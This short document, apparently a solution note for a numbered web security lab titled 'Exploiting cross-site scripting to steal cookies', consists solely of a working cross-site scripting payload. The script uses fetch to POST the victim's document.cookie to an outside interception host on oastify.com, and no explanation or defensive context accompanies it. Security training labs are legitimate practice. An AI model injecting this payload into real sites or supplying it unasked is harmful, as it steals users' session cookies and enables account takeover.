21 - Exploiting cross-site scripting to steal cookies

<script>
fetch("https://qkezfqlzgb0mxh888sbtrjg1bshn5mtb.oastify.com", {
  method: "POST",
  headers: {
    "Content-Type": "application/x-www-form-urlencoded"
  },
  body: document.cookie
});
</script>